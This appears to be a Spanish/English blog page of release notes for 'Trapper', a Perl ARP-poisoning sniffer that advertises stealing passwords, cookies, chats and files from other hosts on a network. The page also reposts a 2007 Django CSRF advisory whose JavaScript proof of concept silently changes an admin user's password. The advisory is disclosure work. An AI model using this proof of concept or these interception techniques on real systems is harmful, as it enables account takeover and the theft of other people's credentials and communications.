Trapper 0.4 is ready and released, download it from:
http://nediam.com.mx/download.htmlChangelog:
+ Enable/Disable promisc option added
+ Lenght of the packet option added
+ Time between ARP packets option added ( Poisoning time )
+ Debug option added
+ Gateway Detection
+ Automatic Network Detection
+ Firefox Cookie injector
+ New MSN Sniffing ( based of sessions )
+ VNC Sniffing
+ SIP Sniffing
+ TeamSpeak Sniffing
+ FTP RETR file stealing
+ Improves in Http Sniffing
+ Http Base64 support
+ Http Cpanel ports support
+ Http Multipart Post Support
+ Rewrite of SMTP sniffing
+ SMTP Snarfing ( attachments )
+ Some code clean ( working in all trapper rewrite )
- Bad http regex matching with trapper.conf values
- 2Wire check on poisoning loop fixed
- Trapper died attemping to write the saving file, now it just warns the user
- Couldn't sniff on 'lo' interface
- IMAP output sniffing fixed
And report any bugs!
Well we have some videos of 0.4 trapper in action..
http://nediam.com.mx/trapper/videos/vncsniffing.ogg
http://nediam.com.mx/trapper/videos/cookieinjection.ogg
Trapper 0.4 gonna be released someday this month
Any comments are good.. cya
Bueno pues para q no digan que ya no se esta desarrollando, pues si estamos trabajando ya sobre la 0.4 de trapper que incluira:
Https Sniffing
MSN Sniffing basado en sessiones 100% stable ( sin uso de base de datos etc.. )
SIP Sniffing
Cisco Sniffing
Cookie injector ( Bastante interesante )
Y esperamos tambien meter:
VNC Sniffing
RTP Sniffing
Aqui solo les dejo una screenshot del nuevo msn sniffing y pues lo demas, solo esperen =)
http://img502.imageshack.us/img502/5812/newmsnsniffingwc6.png
Posted by
crypkey on
Random New features:
Fake Mac supported almost in every distro
FTP and POP3 passwd in different files
Host and path for HTTP sniffing
Installer added
Code cleanup
Stats added
Bugs fixed:
POP3 bad handling of multiple logins
Saving incorrectly irc private msgs
Killing incorrectly APR attack
Post in HTTP sniffing not detected correctly
Download: http://nediam.com.mx/trapper/download.html
Posted by
crypkey on
Random
Small bug fixes:
Sniffing after APR
Bad cookie saving.
Download: http://nediam.com.mx/trapper/trapper-0.3.3.tar.gz
Posted by
crypkey on
Random
Cosas nuevas:
- Verbose para IRC Sniffing
- Dirección MAC falsa (00:11:22:33:44:55 o aleatoria)
- Trapper.conf (para especificar parametros que se deseen sniffear via http, similar a la funcionalidad de Cain)
- Especificar ports en trapper.conf
- IRC chat sniffing
Bugs arreglados:
- Detección de la dirección IP local
- HTTP sniffing double value
- Install.pl, modulos faltantes
- Mostrando cookies en blanco
Download
Click HERE!
Any bugs report it to:
RTM Forums
or at crypkey@0hday.org, nediam@0hday.org, nahual@0hday.org
Posted by
crypkey on
Random
We are currently working on https sniffing and smb downgrade sniffing, probably next release will include them
w00t.
Improvements:
Http Sniffing
APR
Features:
Cookie sniffing
-v msn and cookie option
Bug Fixes:
Bad parsing on http sniffing
Download:
http://nediam.com.mx/trapper/trapper-0.3.1.tar.gz
Posted by
crypkey on
Random
Bug Fixes:
- Install.pl
- Http Sniffing
- APR timing.
- Some other crappy fixes
Improvements:
- MSN Sniffing
- IRC Sniffing
- Http Sniffing
- APR attack
Any comments or bug reports go to: www.zonartm.org/foro
Download:
http://nediam.com.mx/trapper/trapper-0.3.tar.gz
Les paso el reporte de un fallo en django:
Author: J. Carlos Nieto.
Date: Oct 21, 2007
There exists a security hole in the default django's admin panel.
Background
==========
Django is a high-level Python Web framework that encourages rapid development and clean, pragmatic design.
Django has an automatic admin panel that allows a person with admin privileges to modify the database tables, it allows to change any user password too.
See more at
http://www.djangoproject.com
Summary
=======
django has, by default, no CSRF protection, this may allow an attacker to change any user password by tricking a victim with admin privileges into a special forged web page (even in a a totally different server) that sends a request to change the password of the user with id = n. The victim does not know that the form was sent. If the victim has admin privileges the exploit will succeed, otherwise nothing will happen.
Severity
========
Mild. This problem exists only with the default installation and can be easily solved using a middleware found in here:
http://www.djangoproject.com/documentation/csrf/.
Proof of concept
================
window.onload = function() {
var url =
"http://127.0.0.1:8000/admin/auth/user/1/password/";
var pass = "funky";
var param = {
password1: pass,
password2: pass
};
var form = document.createElement('form');
form.action = url;
form.method = 'post';
form.target = 'hidden';
form.style.display = 'none';
for (var i in param) {
try {
// ie
var input = document.createElement('');
} catch(e) {
// other browsers
var input = document.createElement('input');
input.name = i;
}
input.setAttribute('value', param[i]);
form.appendChild(input);
}
document.body.appendChild(form);
form.submit();
}
Solution
========
Use the django's CSRF protection in all your applications. Take a look at
http://www.djangoproject.com/documentation/csrf/.
Disclosure Timeline
===================
2007.10.18 - Vulnerability found
2007.10.18 - Vulnerability reported to vendor
2007.10.18 - Vendor response, among other things: ..."it's not a vulnerability unless you can somehow force the code into my browser"...
2007.10.21 - Advisory release
License
=======
Copyright 2007 J. Carlos Nieto
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
Posted by
crypkey on
Random
Trapper es un sniffer que aparte tiene la modalidad de lanzar ataques de ARP Poison. Está escrito en Perl. El desarrollo de Trapper fue inspirado en la funcionalidad de
Cain, pero como éste sólo funciona en Windows, quisimos hacer un programa que funcionara en Linux/Unix. Lo pueden descargar de
aquí.
Para cualquier bug report, comentarios, dudas etc.. pueden usar el foro de
RTM
Lost your password?
Get your account
{ 
